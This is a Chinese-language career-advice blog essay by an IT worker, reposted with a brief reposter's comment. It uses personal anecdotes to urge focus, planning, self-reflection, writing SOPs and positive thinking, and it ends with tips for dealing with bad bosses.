有个笑话：少壮不努力，长大搞IT。说明IT不好搞啊。

前言，IT精英们，为什么你们的幸福指数这么低？

笔者2003年大专毕业，一直从事IT行业，今年刚好9年，中间坎坎坷坷，历经风雨，痛苦很多，快乐也不少。

因为笔者的同事（经常交往的）基本上都是以IT为主业，观察良久，发现一个问题：就是绝大多数的IT从业者，都是很年轻的人，这或许是我国的国情决定的吧：就现阶段来看，主力军是80后，后续主力军是90后的。就幸福指数来说，90后更快乐，80后逐渐开始痛苦了———因为一般80后从事IT行业已经接近8年了。人生能有几个8年？8年里，从懵懂无知，到稍微开点眼界，知识，然后就是盲目乐观，等过了8年，就突然开始冷汗直流了：我以前为什么得过且过，没有危机感？现在没有成就感（虽然做了很多的工程，做了很多的项目，帮老板赚了很多钱），只有危机感？

第一部分：岁月不待人

最近看到一个笑话：某大学打出巨大条幅：CS毁一生，网游穷三代；夜夜上自习，必成高富帅。初看，惹人笑，再看，令人心酸。多少的青年才俊就是毁在这些电子上面啊。游戏，最大的害人之处是：你在快乐的浪费时间，丝毫感觉不到浪费的危害。

以笔者为例，2003年大学毕业时，学的计算机网络技术，那时和努力，可是方向都不对，连个CCNA都没有听说过，只考了一个国家计算机技术三级，自认为很有成就感（主要是同学们都只考了个2级）。可是出来以后，发现大家都不认国内的计算机等级认证，最低都要CCNA，两年之后，市场只认CCNP了。

笔者今年32岁了，自学CCNP4年，居然还没有全过，真是难以见人。

我现在的一个室友，89年的，刚刚来成都上班。他有着一般年轻人的优点，也有一般人的缺点。他每天下班回来，吃过饭，打开电脑，看电影。我总是跟他说：年轻人啊，你的时间耽误不起啊。他呵呵一笑，说：我也知道，就是管不住自己啊。

多少年轻人啊，都是因为一句“管不住自己”，导致了多少可悲的后果！

在 我国古代，圣人早就说过：修身齐家治国平天下；第一要素，就是修身，所谓内圣外王，不过如此吧。修身，要从年轻的时候就开始。读过《蒋JIESHI日记》 的人，会很惊讶这么一件事：他居然连自己做的那些见不得人的事都会写上去，而且白天做了错事，晚上会很深刻的反省！要知道，他作为一个地区的最高级领导 人，他写日记的目的绝不是为了给别人看，他写日记是为了给自己看的，给自己反省立下证据的。他那时在外界已经没有人能监督他个人了，他自己还要监督自己？ 为什么？因为欺骗自己不得啊，一个人或许能够上骗天，下骗地，中间骗空气，但是，他无论如何也骗不了自己！

有心理学家早就得出结论，一个人，如果在25岁以前都不能学会思考，那么他很可能这一辈子都不能学会正确的思考了。所以工厂里招学徒工都不要年纪大的，除了出于薪水的考虑以外，更多的是因为25岁以后心理年龄差不多就定型了，基本上不具有可塑性。一张白纸，你可以在上面画出美丽的画来，一张涂抹过半的纸呢？基本上不能再作画了。

流光容易把人抛，红了樱桃，绿了芭蕉；多少的IT少年啊，请珍惜时间，不要自我欺骗！尤其是众多的行业当中，尤以IT更新得最快，如果不想落伍，请实时更新自己的知识库。白发不随老人去，看看又上青年头，别辜负了少年头啊！

再讲一个很重要的方面，那就是看准方向。

基本上可以说，IT是一个很广泛的行业，大体上又可以分为四块：1，开发（以C#,J2EE为代表的），2，系统（不含开发，专门做维护的，以RHCE，MCITP为代表的），3，网络（不含系统和开发，以华为和思科做代表的），4，数据库（含数据库开发和维护，以DB2，ORACLE,MSSQL为代表的）。每一个领域都是博大精深的。每一个领域，只要你做好了，基本上都可以过上小康的生活，要是你浅尝辄止呢？那就只能顶多混个温饱吧。

IT职场大忌：什么都会一点，什么都不精。虽然很多的招聘广告上写着：精通J2EE,ORACLE,Linux，CCNP优先的。你一定见到过这种招聘广告，我只能很悲哀的告诉你，除非是天才和神仙，不然想要这样样样都精通的，基本上是不可能的。你看到这样的广告也不用怕，其实他们想找的或许就是一个J2EE程序员而已，其他的都是参考值。

所以，一个良心的建议就是，如果你想立志搞开发，那就死盯住开发不放，先通一门，再学其他的，绝对反对JAVA,C#齐头并进；如果你是搞网络的，不要妄想一边学习CCNP,一边学习MCITP，没用的，你去面试的时候，别人当然会看你的证书，但是，更重视你的能力。能力到了，证书可以没用，照用；能力不到，证书白考！我公司的原来的那个网管，进来的时候还是个CCNA，但是薪水高达20K，为什么？因为我公司需要一个能够保证7*24小时网络畅通的人，他能够！先前面试过好几个CCIE的人，居然连VRRP都没用做过，ASA防火墙都不曾配过，能顶事么？！

有一次，一个年轻人问法拉第：请问您能告诉我您成功的秘诀么？

法拉第问：你能让眼前的 阳光点燃一张纸么？年轻人说：不能！他就拿出一个放大镜来，放在阳光下，很快就点燃了一张纸！法拉第说：年轻人：把你的所有精力都集中到一点上去，你就能 成功啊！所以，搞开发的，你就一门头的先学好学精一门开发语言，然后再触类旁通的学点别的语言；搞网络管理的，你最好做个4年规划，4年CCNP,再四年拿个CCIE。做系统管理的也一样，万不可以今天玩玩windows，还没有弄懂AD是怎么回事呢，明天又听说搞LINUX的前途无量，就跑去搞LINUX玩，这样，最终恐怕会玩死自己。我有个很牛的同事，他以前在汤姆孙电子，汤姆逊电子集团里的所有DC服务器都是他部署的；后来来我公司4年，公司的系统管理也是井井有条；在我离开公司的前两个月，他被微软挖了过去，在深圳，做IT system管理的，能买房就很不错了，能进微软，那就少之又少了。他在进微软之前的两个月，自学了Redhat，随便就考过了RHCE，问他为什么那么轻松就过了，他说：天下大道相通啊———-windows和Redhat虽然完全是两个系统，但是，原理还是一样的，学到一定的程度，他们的技术都有很多相通呢。我忽然想起了武侠小说里的高手的境界：练到顶尖高手的境界，飞花摘叶，皆可伤人哪。我哥哥做VB10年，基本上没有摸过JAVA，居然在过年的时候抽空帮一个同学用JAVA写了个网站。

看准方向之后，就是撞到南山不回头的干劲。不信，你随便问问你身边的那些搞IT搞得好的人：你的IT之路一直是一帆风顺的么？都很轻轻松松的过来的么？保证十个中有九个啐你一脸吐沫：老子的IT之路，头两年就是在地狱里混过来的！我上大学欠一屁股债，大学毕业时工作看来都不好找，又借债一万二去了一个培训公司培训JAVA，培训6个月，出来的工资才2000不到！2000不到的工资还死扛了2年，才有了今天！当年培训的时候，老子一周才能吃上一次肉——肉包子里的肉！

年轻人，谁没有炼狱的时 候？！中国人都太聪明了，特别喜欢耍小聪明，要知道，既然是小聪明，大家都知道的小道道，难道只有你会耍？你今天不肯努力，尽是耍小聪明，将来必定有一天 被小聪明给耍了！不经过炼狱一般的痛苦，怎么能理解幸福是什么意义？不挺过炼狱的痛苦，如何变得深沉？深沉点吧，不要做个浮躁的人。你总以为，在寻找知识 的路上，总有捷径可走，其实，捷径就是拿汗水浇灌出来的鲜花啊。学到的东西，都是自己的，别人是帮不了你的忙。这就像悟道，别人是替不了你的！

我老家有句话：六月不热，五谷不结！而在最热的六月里，我们最是需要拼命的劳动。

第二部分：好的规划，是成功的一般
有人说：好的开始，是成功的一半；古人又说：凡事预则立，不预则废！我们做一件事，必须事先有个好的规划，越详细越好，然后就是看执行力了。记得IT届大 佬郭台铭说过：走出实验室，没有高科技，只有执行的纪律！这里其实隐藏了一条，那就是你的规划得很好，得立足现实，面向未来。就拿刚刚毕业的大学生来说， 要是专科的规划如下：1，1年通过本科自考，2年拿下研究生考试……….那我只好说，这是痴人说梦！你也不想想，要是自己真的有这么好的资质，这么能考 试，当初干嘛考个普通的大专呢，而不是北大清华呢？你要是做出如下的规划：1，毕业4年内坚持自考，拿到本科文凭，再4年，拿到NP认证。那我要告诉你： 你的规划很好，但是，似乎可以换一个顺序：1，先 在头一个4年内拿到NP认证（这个是切实可行的），然后在第二四年内再考个本科自考文凭（其实第二个四年规划应该第一个四年计划执行完毕之后再考虑，因为 计划没有变化快，如果你的第一个四年计划执行得好，说不定第二个四年你可以直接考个研究生了，本科是可以跳过去的）。

本人在这方面，是个失败的典型，不怕丢丑，说出来，给大家做个反面教材，不至于让更多相同机遇的人走同一条失败的路，浪费更多的社会资源。本人在2003 年毕业参加工作后，即着手准备参加自考———中山大学计算机网络专业独立自考本科段。由于本人资质驽钝，所以自考进行得很慢。每年都报了三次 名，每次都报两科，结果是：每次都过一科！———-第一次过了两科，其中一门是英语（这里要说的是，本人一直坚持学习英语，没有别的方法，就 是坚持晨读，从来不曾落下，所以英语一直很好，早就能拿英语当工作语言使用了，似乎这一点可以安慰一下 自己）。照此下去，如果不出意外的话，本来自考应该是可以在2008年完成了。

第三部分：板凳要坐十年冷
可是，意外还是出现了！我四年里在深圳的时候，一直是做基层的IT HELPDESK，毕竟是制造业工厂，所以薪水一直是低得惊人，进去后，基本上是没有怎么涨过薪水（后来总结了一下，大约总共涨了500块，平均每两年涨250）。

做满两年之后，我开始谈朋友了，毕竟嘛，人都24岁了，也该到了思春的年纪了。我本人又活泼好动，广交广结———做IT helpdesk的，不广交广结不行啊———-毕竟要为那么多的人服务，你不去找他们，他们也会找上你的。所以，那时我对什么都感兴趣，当然 了，对女孩子更感兴趣了。同时，因为我还兼职中央人资下辖的读者俱乐部的活动部委员，专门负责每月一次的大型户外活动，所以我认识了好多的PPMM,（当 然还有好多的帅哥—-作为同性相斥的原则，本处略去对帅哥的关注），“乱花渐欲迷人眼”，近水楼台先得月，谈了一个又一个，可是感情来得快也都去得快 ———-毕竟这是一个很现实的社会，我在组织外出的游山玩水之中所扮演的角色，所散发出来的光环，很快就被轻薄的工资单给戳穿了。

厂里的美女们都一个个的目光如炬，快的一周，慢的两个月，都把我给看穿了。经过多次打击之后，我终于愤怒了，这一切都是我的低薪惹得祸啊！古人说：愤怒，会让人失去理智，这是真的！

周六不再加班了，不再学习了，而是去了人才市场，美其名曰：寻找动力！当然，这一切，都是背着老板做的，不然，估计早就开除了（我后来想想，其实老板只是装作不知道而已———–那么低的薪水，谁不想跳槽啊）。

深圳人才大市场，就是一把大火，经常把人的理智烧成一片灰烬！

记得有次应聘一个系统管理员的职位，对方问：会组策略吗？我一愣，反问了一句：什么是组策略啊？！（题外话，现在当然不同了，要是有人问：会组策略吗？我 会说：勉强算精通吧——–真的，人只有真的会了，才知道自己原来是如此的浅薄，当然，不要看到这句话而妄自菲薄啊！）回来学习组策略，把自考的 事先放下！又有人问：会CCNA吗？啊？什么是CCNA啊？哦，把自考的事放下，学习CCNA！再过一个月，哇塞，整个人才市场都在招J2EE的程序员， 立刻报名参加一个野鸡培训班，学习J2EE，花了我半年的积蓄。顺便说一句：当年我有个教我们的老师叫张国栋，还有我的一个同学曹志斌，你们都在哪里呢？ 都好吗？要是看到这篇博客，请跟我联系啊。毕竟，我们当年一起在深圳人才大市场背后的一个民房里学习了8个月的J2EE。

我的努力终于有了回报，HELPDESK部里的LOTUS开发大师范泳决定开门收徒，只接受邀请，不接受申请。他看中了我，于是，我成了他的第一个大徒弟。部长老李提出条件：要两年不走的。我说好吧。

本来我也没有打算走的——-我非常珍惜这个机会，要知道在很多的地方，IT support人员基本上是不可能转为开发的。可是，公司的一些人事斗争，居然在这个节骨眼上逼走了我的一个准女朋友———之所以说是我的准 女朋友，是因为她没有明确答应做我女友，只是还是处于那种答应与不答应之间的状态，似乎我一努力，她就要答应了；她走的时候，泪珠儿颗颗像断线的珍珠，滴 在厂东门外面的美人蕉上，我还记得，她说：“你别做IT了，这个没有出息，我们交往这么久，我为什么不答应你？还不是因为你这个岗位根本就不可能保证我们 的未来？！我要回老家去了，你要是有心，来看我吧，别太迟，太迟了，就晚了！”天地良心，哪个热血男人能受得了心爱的MM哭成这样？！她挥一挥手，不带走 一片云彩，回了美丽的江南，苏州，剩下的，都是我的思念！

午夜梦回之际，我总在想：我一草根，得佳人以青眼，不能让她太过于悲伤。终于，一昏头，得罪了当初对我青眼有加的李部长，辞职去了苏州（在此，要对李部长 说声对不起了，我当年年少气盛，辜负了您的厚爱，也让您在协理面前抬不起头来）。原以为我这冲冠一怒，以为红颜，她会很高兴的，可是，世态炎凉再次重演， 等我去了苏州以后，她说：你在苏州有工作吗？我说：没有，只有你！她说：没有工作，那也没有我！心在一刹那，真的碎了！然后呢？很多人问，没有然后，我在 苏州无依无靠，漂泊7天，身心俱疲，又回了深圳。年底，她出嫁，我没有得到任何消息，第二年7月，她生了个女儿，告诉我说：你侄女儿真可爱啊。       

91ri.org:上面两句话是原文没有加粗加红 这里我加一下 因为我遇到了类似的问题 我相信很多搞IT的朋友在日子中也有可能遇到 。 但是我想说的是 当你在考虑着结婚的时候先想你是否有资本 一怒冲冠为红颜 百分90是文中的后果 ， 同时我表示我的结果与文中的一样 所以我感慨良多啊。

或许有人说：你真是的，不是说要总结“板凳要坐十年冷的”道理么？怎么写个人的一些糗事？是的，我只是想告诉你，绝大多数痴男怨女们，在这个社会，你首先 要安身立命，你要坐得住冷板凳，要有个工作，有个核心的擅长的领域（HELPDESK不算领域），如果是搞IT的，会更加艰难———–因为 你要在十年黄金岁月里，赚足别人40年才能赚回来的钱，所以你的青春耽误不起，更不要轻言为红颜做出大的牺牲，别人可能不需要———-特别 是，即使你做出巨大的牺牲之后，不能丝毫改善对方的生存状态，不能大幅度改善彼此的生活质量的情况下，请不要做出太大的牺牲———–也就是 说，不要做出无意思的牺牲。

否则，你就会像我一样，糗大了！

第四部分：出了问题，首先从自己身上找原因
中国人似乎从小就有个毛病。小时候走路摔倒了，父母会假装打土地，说：都怪这条路不好，害得宝宝摔跤了。长大了以后，出了任何问题，都会从别人身上找原 因，这真是国人的一大悲哀啊。可是更为严重的问题是:很多人从此对自己的人生都不负责了，只要出了问题，都会说：这不是我的问题，这是XXX的问题！诚 然，有些时候的确是这样的，但是，你真的没有问题么？其实，仔细想一想，我们或多或少都是要负责一些的。

就拿我自己来说，工作内容中有一项是日常工作中项目的数据备份。我为人还算谨慎的，每天上班来的第一件事，就是打开电脑，远程过去看看，是否昨晚备份成功 了？然后做个报告给老板：昨晚做了备份，备份了哪些东西，多大？备份的源和目的各在哪里？老板从来没有检查。上个月他突然想起来了，就检查了一下，大的问 题没有，就是太凌乱了。他说：为什么你要每一个目录都备份一下呢？难道不能一次全部都备份了么？我一下子傻在那儿了。他一数我写得备份脚本，28个！老板 苦笑不已：说你没努力吧，写了那么多的脚本，说你努力了吧，却做得不完美！                    我后来仔细检讨这件事，发现：如果我第一次写好脚本，运行后，就请他看看，是否不用这么尴尬？记得还在读高中的时候，有一次放月假的早晨，大家很吵闹，班 主任很生气，就把大家给留学了，然后说：大家把三个吵得最厉害的同学选出来，否则，都不准备回去！大家没办法，就投票选举，我的同桌中奖了！我知道他是被 冤枉的，因为一个早晨，他都在规规矩矩的读书呢，根本就没有吵闹啊。可是他为什么被选中了呢？因为他平时很顽皮的，在大家的映像中，那天肯定是吵闹了！

所以，有一天你被人误会了，你一定仔细想想，可能是你平时这种事情做多了，所以别人才会误会你了吧？

笔者本身还有一个惨痛的教训，至今不忘。

当年高考的时候，我考了497（原始分），照说这个分是上不了大本的，当年差了7分。但是，凡事都有意外。我班的另外几个同学，分数都比我少点，报了襄樊 学院，居然都被录取了，而且都是本科。因为当年我不知道，一门心思的认为：这个分数只能读专科，所以错过了——这一错过，不知道什么时候才能弥 补。如果我当初稍微多多询问一下，不就也可以上个本科么？

所以说：性格就是命运，思路决定出路。

当然，不是说命运不可改变，性格不可以改变。性格也可以改的。经过多年的打磨，我早就知道，这个世界上，办事的方法远远不止一种。每当我陷入了一种困境的时候，我都会想，是否真的只有这么一种方式方法？是否我的思路错了？

我知道：成功一定有方法！

第五部分，及时当勉励
做IT的，其实很多人是吃青春饭的——-当然，在国外是不一样的。如今的码农，越来越多。大家可以想一想，每年都有几百万的大学生毕业，每年大约 要毕业100W的程序员。从成本的角度来考虑，做程序员的，做IT系统运维的，其实都很容易被人取代———-谁是不能被取代的呢？将来，我们 有一天要被人取代的时候，一定是有原因的，要么，你的精力不如他了，他比你年轻，要么，你比他贵了，要不……..

你可能会说：我到时候做了几年之后，就做到PM位置上去了，怎么会有这种危机呢？当然，你完全有可能是会做到PM的位置上，但是，别忘了，从概率的角度来 讲，你做不上的可能性更大。你想，几百万的人员中，才能升多少PM啊？其他的那么多的码农干什么去了？一部分转行了，另一部分呢？

如今，我做了9年的IT，或许因为资质驽钝吧，每到夜深人静的时候，都有很严重的危机感，才刚刚学会了思考而已，也似乎刚刚入了门而已。

我知道，前途依然艰险无比，情况依旧不容乐观，但是，至少我有了方向，有了目标，不至于随波逐流，不至于走到我不想去的地方。

IT小技巧：多写SOP

佛教禅宗有句很有名的话：教外别传，不立文字，以心传心。可是，搞IT的决不能这么做，为什么？请先看本人的巨大痛苦。

本人刚进公司时候，项目组做如下分工：A负责写server引擎，B负责写后台数据库，称之为INI，我负责系统架构的设计，以及发布新的版本到互联网上 去。第一次发布的时候，是A口头教我怎么发布server引擎，要注意哪些事情；B口头教我怎么发布ini，以及如何修改配置参数。幸好我还是老手，知道 口头讲的很不算数，就把他们讲的给写了下来，但是不是很全面，我发布一次之后，问他们：以后应该不会大变吧？基本上都是这么发布的吧？AB都说：基本上不 会大变的，要是有变化，我会告诉你的。

痛苦从此开始。因为A写的引擎是基于Ruby+Passenger+Redis+Postgres+Nginx架构的，第一次发布之后，每次再发布版本的 时候，Ruby和Nginx一般都会升一次级，我每次都要发布新的基础架构，差不多算是每次都要把server重装一次，这个工作量是可想而知的。第一次 发布，费了大约三个小时。发布完成之后，老板说：怎么发布一个第一个版本都这么慢呢？以后要快点。然后问我：你以后多久能发布一个新版呢？我说：三个小时 吧。老板说：“太慢，以后一定要在两个小时之内发布完毕。发布新版是你的重要职责之一，你要多多练习。”更要命的是，AB发布的新版中每次都需要安装新的 插件，每一个新版发布之后，光新的插件都要装三个以上。或许你会说：三个插件多吗？才三个而已；可是，你哪里知道，我之所以决定要安装三个插件，是因为发 布完成之后，发现网站不能运行，一排错，哦，少一个插件，安装一个；再测试，有报了一个错，哦，又少一个插件，再装一个，最多的时候，一个通宵，居然安装 了17个插件，理所当然的被老板骂了：速度太慢了。

问题来了：为什么跟上一次版本相比，每次都要要多装那么多的插件呢？A说，产品经理需要多加几个功能，当然要多几个插件来支持；既然要多装几个插件，为什 么你不提前通知我呢？每次我都要在发布之后做测试才知道要安装哪几个插件？这样浪费很多时间啊。这个我也不知道啊，因为我只负责写引擎，引擎在我的本地机 上跑的时候，我太忙，没有记录要多安装哪几个插件，而且，即使记录了，也未必准确啊，还是你在生产服务器上发布完了之后做测试，根据需要来安装插件比较准 确。可是，你知道吗？因为你的引擎每次都要多装几个插件，我每次都被老板骂，说发布新版本都太慢了。A说：那是你的事啊！

好一句那是你的事！这时候，我才发现，当初没有问他要一个标准的发布流程标准操作（SOP）是多么的大的失误。

下一次在项目例会上，我大声疾呼，必须要一个引擎发布SOP。老板问起，我如实说明，老板由是要求AB各写一个发布自己的引擎的SOP，给他看。没想到老 板看后雷霆大怒：“我四个月来一直责怪他发布速度太慢，今天才知道责怪错他了！你们自己写的SOP都这么复杂，还写不清楚，难道不能把发版流程简化一下 吗？就没有更好的办法么？明天发版的时候通知我，我要看看你们自己发版要多久？”第二天发版，A用了7个小时，B用了13个小时，老板怪下来，他们都说自 己平时没有发布过新版，自己不熟。经过几次讨论，终于有了新的办法，那就是用脚本发布，AB各自写了自己的比较完整的SOP，效率大有改善。老板还说，如 果我按照SOP来发布，有问题，就是他们的SOP写得不好。AB一紧张，都有了好办法，那就是用bundle install 的办法，把多个配置文件合成一个，每次发布完毕，只需要配置一个文件，整个网站就发布好了。

这是最近的一个案例，所以非常深刻。

以前我在工厂里做IT的时候，工厂里就特别强调SOP：一个电路板来了，一个人只做一道工序，比如上一颗大的电容（小的都用SMT机器贴上了），SOP上 写着左手拇指和食指拿电容，你就不能用食指和中指拿电容。我刚进IT部门的时候，协理在IT大会上就讲：“新人没有教好，是熟手的责任，熟手带新人，必须 写SOP，没有SOP的，不准带新人！”可见SOP 的重要性。

后来我成为熟手，我带新人的时候，自觉写好SOP，每当新人出错的时候，我第一句话是问：你按照我写的SOP来做了么？他要是说按照做了，那责任就在我身上，如果没有，那责任就在他身上。

更何况，SOP还有笔记的作用,有梳理知识体系的作用呢。再怎么好记性的脑袋也没有笔头好啊。自觉养成写SOP的好习惯，可以说，对搞IT 的人来说，受益无穷。

第六部分：一切正面思维
什么叫做正面思维？正面思维是人在处理任何事情时都能以积极、主动、乐观的态度去思考和行动，并促使事物朝着有利的方向转化。正面思维会使人在逆境中更加 坚强，在顺境中脱颖 而出，变不利为有利，从优秀到卓越。从认知上改变命运，是事业成功和实现自我的有效途径，它的本质是发挥人的主观能动性，挖掘潜力，体现人的创造性和价 值。

人的思想，大脑，其实是很神奇的一个阵地，这里，可以产生世界上最高尚最积极最神圣的思想，也可以产生世界上最低级最消极最龌龊的思想。

最简单的例子，你在公司里不违背良心的做人做事，却得罪了老板，被他找个借口开除了，你怎么办呢？这种情况，很多人都能碰上。你是去劳动局告他？去找律 师？去请黑社会的报复他？这些都是消极思维，对你来讲，没有丝毫的好处；比较正面的思维是：把这件事忘了———人在适当的时候懂得遗忘，是一 件很艺术的事。你重新去找一个工作，好好做。面试的时候，多问几个问题，多了解你的准老板，对于那些不靠谱的，不要轻易接受工作。

所谓“吃一堑，长一智”，才是正面的思维，积极的做法。况且，塞翁失马焉知非福？说不定你找到一家好的公司，碰上一个好老板，薪水比前一家高了一半，这种事情也是常有的。

但是，人跟人相处是很微妙的事情，因为“物以类聚人以群分”，你是什么样的人，你在什么样的环境里得心应手，左右逢源，你又在什么样的环境里左支右绌，动辄得咎，关键是看你自己是什么样的人，碰上什么样的环境。

人的一生，顺境常常占十之一二，逆境也不少，有些人多点顺境，有些人多点逆境，这个原本就没有定论的东西——-由此可见，上帝也不是很公平的。不过，上帝有自己的打算盘，他要把一块外表灰头土脸的破铁打造成一把光芒耀眼的宝剑，能不下点猛火么？!

正面思维的“正面”，实际上有三个方面的含义。 　　第一，自己的正面：所谓“自知者明”，看清自己的优势和潜力，充满必胜的信念，这样，就不会稍遇挫折就轻言放弃，从而做到持之以恒，直到成功。 　第二，别人的正面：看到别人的正面，见贤而思齐，就能从别人身上学到更多东西，也更能赢得别人的好感和尊重，从而拓宽自己成长的道路。 第三，环境的正面：上帝为你关上一扇门，必然会为你打开一扇窗。不管我们处于什么样的环境之中，一定要看到光明的一面，保持乐观的心态。第四，人在顺境的 时候，不要妄自尊大，人在逆境的时候，也不要妄自菲薄。你要知道，你处于逆境，别人的日子也不好过啊，大家都一样，你干嘛这么悲观？你或许会说：你不知道 啊，我女儿才三个月，我就被黑心老板给解聘了，我要是一人就好说了，可是我却是有家要养啊，我能不悲观么？兄弟，请问，第一，悲观的情绪有用么？它能帮你 重新找到一份工作么？不能吧？甚至，悲观还是一种可怕的病毒，它会不知不觉得掏空你的能量，让你看低自己，看清自己，使自己的形象更加猥琐，你更难以崛 起！事已至此，悲观无益，节哀顺变吧，你该重整旗鼓，才不至于一蹶不振啊；人的一生当众，谁能没有个三长两短的呢？你毕竟还有命在，还有健康的身体，一身 的绝学；你打开报纸看看，每天都发生多少车祸，天灾，人祸啊，照你这么说，他们还活不活呢？！

至于你在顺境的时候，也请不要妄自尊大，过于嚣张————你要知道，你能有今天，不全是自己的功劳，所谓一将功成万骨枯啊。你能够 升职加薪，那是多少人的共同努力———–停停停！你说什么？我升职加薪跟别人有个毛的关系啊？谁为我努力过？他们恨不得升职加薪的是他们自 己呢，他们甚至还在背地里使绊子进谗言呢。别激动，new man,你要知道，你这个公司能赚大钱，是市场部在前面拼命侦查，销售部的同仁们每天都磨破了脚掌，而HR等后勤部的同事们则为了招几个精兵强将，说了多 少好话啊。你再看看历史上那些高人们，哪个不是功成不居？谦虚待人的？即使那样的人，也难免得罪很多人呢；再看看那些飞扬跋扈的将军，典型的的如年羹尧 等，事例还少么？我不是教你装B，我是要你明白，真的是满招损，谦受益啊。更何况，不全是你个人的功劳，你那么得瑟干嘛呢？你要知道，你的老板为了把你升 上去，在高层老板面前为你说了多少好话？而你这么的不识时务，处处表现得跟你现在的职位不相称，叫他怎么在大老板面前抬得起头来？而你的嚣张，又会得罪多 少人啊？你要真的识相，那就足够低调，你要明白，老板今天能给你的一切，明天就能剥夺这一切！

 第七部分：遇上烂老板了怎么办？
———世界如此险恶，我们要内心强大！

人有悲欢离合，月有阴晴圆缺，此事古难全！无论我们自己多么的努力，或者多么的优秀，都不能保证我们不会遇上烂人做同事，更不能保证不会遇上烂人做老板。很多的事情我们自己不能控制。有句话说：不怕神一样的对手，就怕猪一样的队友。这话太对了！

看了这一节的题目，你是否很奇怪，您不是说：遇事首先要从自己身上找原因么？怎么老板有问题了？大家要知道，既然世界上事实是存在很多的烂人的（包括你 我，都在一定的程度上有些烂或者很烂的），那么，总有一些烂人，带着他的那些烂品质坐上了经理的宝座，很不幸，你我就是他的下属。烂老板一般有如此特征：

1，做事没有规划：他就是这个项目的项目经理，开发一个手机终端应用程序，作为一个老程序员（做了8年开发），他出身煊赫（名牌重点大学毕业），履历耀眼 （全球排名前十的大公司出身），言辞具有鼓动性，面部表情丰富，看起来是一个高手———-是公司花重金从请猎头挖了8个月才从一个大公司里挖 过来的核心技术人才。然后，他请你来，做这个项目团队的的server的核心开发。面试的时候，他问得很细，你很满意，你问他你的具体工作内容，他说：只 有一句话，那就是开发server端，也就是server端的所有开发都归你了。具体内容呢？他会说，是你写server的内核还是我写？我是请你来做开 发的，你还问我？你会觉得，哦，那就是我拿主意了。

对策：针对这样的老板，你一定要有自己的Schedual,什么事情什么时候做完，一定要做到心中有数。你要知道，不能事事都等老板来吩咐，推一下动一 下，而是，自己主动找事情做，自己做自己的项目经理，自觉地对自己负责，这样，你才会快速成长，做完这个项目，类似的项目你就完全没有问题了 ——-这是我在无锡做项目时的体会。

2，项目开展的过程中，不监督，不更正。专搞秋后算账。每天都开会，听大家汇报，然后口头做指导，结论都写在白板上。叫大家用笔记下来。等到下次再开会， 还是讨论相同的问题。很多的问题，没有具体负责人。自己没有讲清楚，就怪大家没有听清楚。如果有人说：你上次不是这么讲的，就开始大发雷霆：我怎么讲的我 会不知道么？！从此那个提建议的人天天在公开场合被骂，每次骂到最后，都来一句：我看你还是去投简历算了，这里你不太适合啊！开会到一定的时候，发觉项目 进度落后了，就开始命令大家免费加班了。到项目的一个阶段性的时候，发觉，啊，这个没有做好，那个也没有做好，大老板怪罪下来，就说：这是XXX的责任， 他没有做好，我已经准备把他开除了,我准备请一个能力更强的人来做，一定能做好…………

对策：项目经理可以没有监督，但是，你必须经常反馈，经常对他和其他项目成员反馈，你做到哪一步了？情况怎么样？碰到什么困难？卡到什么地方了？准备用什 么方法解决？如有可能，最好也请求大家都来定期反馈，回报进度。中国每年失败的项目无数，很大一部分就是因为项目成员没有互相通气，各自闭门造车。这样做 的好处，除了可以防止老板秋后算账，更可以推进项目的顺利进展。要知道，机会都是给有准备的人；有一天，项目组里要提一个副经理，谁心中有一盘棋，谁能为 项目作出更多的贡献，谁能带团队，都是很重要的考量参数。

3，项目角色搞混：请一个系统管理员，要求他什么都会做，基础网络架构设计及实现，系统管理，系统架构的设计，系统的发布，系统的排错，新系统的分析，开 发等等……….一人当十个人用,当一个人是在顶不住的时候，就开始请一个新人进来，对他寄予厚望，然后又准备把另一个熟手给开除了。用人的法宝，就是:开 除！要当心，在这种老板手下做事，你可能会坐上那个注定了要失败的岗位。因为他把角色搞混，要把一个人当十个人用，他对新来的，总是寄予厚望，然后总是以 失望收尾，然后以开除结束，当然，最后项目失败，他也被开除了。

对策：在一个项目中，一定要清楚自己的项目角色，有哪些明确的担当，哪些是我的职责，哪些是谁的职责，大家应该如何相互配合。毕竟，在一个项目中，谁会刻 意的把项目搞黄呢？大家都想着项目成功后，能拿点项目奖金慰劳自己，所以这是的沟通能力是非常重要的，沟通好了，才能避免角色搞混。

4，不着调的分派任务：只要产品经理催一催，开发部的就要24小时运作，大家无节制的加班，美其名曰：奉献精神，年底加薪！

对策：偶尔的加班，哪个项目都免不了；但是经常性的大规模加班就不好了。要避免这种情况发生，第一，要在一开始就站在客户的角度上想问题，这样，可能客户 都没有想到的问题你早就想到了，提前做了布局，那么，你做出的产品肯定能超出客户的期望值，只要你能超出客户，老板的期望值，走到哪里都会左右逢源的。

5，喜怒无常：上一秒中还笑嘻嘻的，下一秒就雷霆大怒，高兴的时候随便许诺，过后就忘，发怒的时候随意惩罚下属，从来不追究原因，喜欢四处揽权。搞到最后，大家都不知道他要的工作标准———也从来不公布工作标准。

对策：可以说，有些实在太变态的老板，你是没有办法应对的。但是，大家既然在一起工作，那就是有缘。对于那些喜怒无常的人，你不必太在意，但是要借此机会 提高自身的修养。所谓“见贤思齐焉，见不贤自省”，他身上有哪些缺点？自己身上有没有？他身上有哪些优点，自己有没有？世上没有一个彻底的坏人，也没有一 个完人。伟大如舜者，还有个瞽叟的昏头父亲呢，但是，一样不影响他成为伟人；我等凡人，但是也不影响我们从对方身上学点好的品质吧？这也是很有趣的啊。

或许有人说：你不是危言耸听吧？职场如此凶险？我当然没有危言耸听，这是我亲身所见。2003年到2007年间，我在南国最大的一个代工工厂里做 ITsupport——–国家高层领导人还经常去厂里视察呢。可是有个副课长就是这样的，他变相开除了（其实大体情况是这样的：你不走，我就天 天骂你，暗示你让你走）我的三个兄弟，只为了提升自己的心腹，最后，在2008年，据可信消息，他被协理给变相开除了——–《圣经》上说：抢人 的，终将被人抢；拿刀砍人的，也终将被人砍。后来，我去了一家美资软件开发公司，可是那个高级经理更变态，我进去6个月，他竟然开除了6个人，每个人都是 在即将满试用期的时候开除的，2009年4月，他终于恶贯满盈，被董事会给开除了———真是报应不爽啊！

在我从事IT九年的生涯中，最优秀的老板当属Sunny了，不仅仅因为他是做技术出身的，懂技术（他先做IT helpdesk, 考了MCSE, 然后准备好了再转而搞网络,考了CCIE），更因为他的OPEN MIND，所以在IT团队里最受欢迎。但是，即使优秀如彼者，也差点被那个烂人被逼走了。后来，他实在扛不住了，被一家全球五百强里排名前十的公司给挖走 了。

